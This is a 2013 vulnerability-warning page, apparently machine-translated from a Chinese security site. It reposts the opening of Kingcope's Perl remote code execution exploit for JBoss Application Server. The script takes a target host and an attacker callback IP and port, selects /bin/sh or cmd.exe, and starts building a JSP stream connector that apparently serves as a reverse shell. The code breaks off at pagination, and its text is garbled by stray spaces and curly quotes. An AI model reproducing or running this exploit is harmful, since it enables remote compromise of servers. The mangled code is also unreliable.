Jboss Application Server remote code execution vulnerability 0day-vulnerability warning-the black bar safety net

2013-06-10T00:00:00
ID MYHACK58:62201339162
Type myhack58
Reporter 佚名
Modified 2013-06-10T00:00:00

Description

Jboss Application Server remote code execution vulnerability 0day Tags: vulnerability 0day

JBoss AS Remote Exploit

by Kingcope

use IO::Socket; use LWP::UserAgent; use URI::Escape; use MIME::Base64; sub usage {print “JBoss AS Remote Exploit by Kingcope usage: perl jboss.pl “;print “example: perl daytona. pl192. 1 6 8. 2. 1 0 8 0 8 0 192.168.2.2 4 4 3 lnx “; exit; } if ($#ARGV != 4) { usage; } $host = $ARGV[0]; $port = $ARGV[1]; $myip = $ARGV[2]; $anyone = $ARGV[3]; $com = $ARGV[4]; if ($com eq “lnx”) { $comspec = “/bin/sh”; } if ($com eq “win”) { $comspec = “cmd.exe”; } $|=1; $jsp=” <%@page import="java. lang., java. util., java. io., java.net." %> <%! static class StreamConnectorextends Thread { InputStream is; OutputStream os; StreamConnector( InputStream is, OutputStream os) { this. is = is; this. os = os; }

[1] [2] [3] [4] next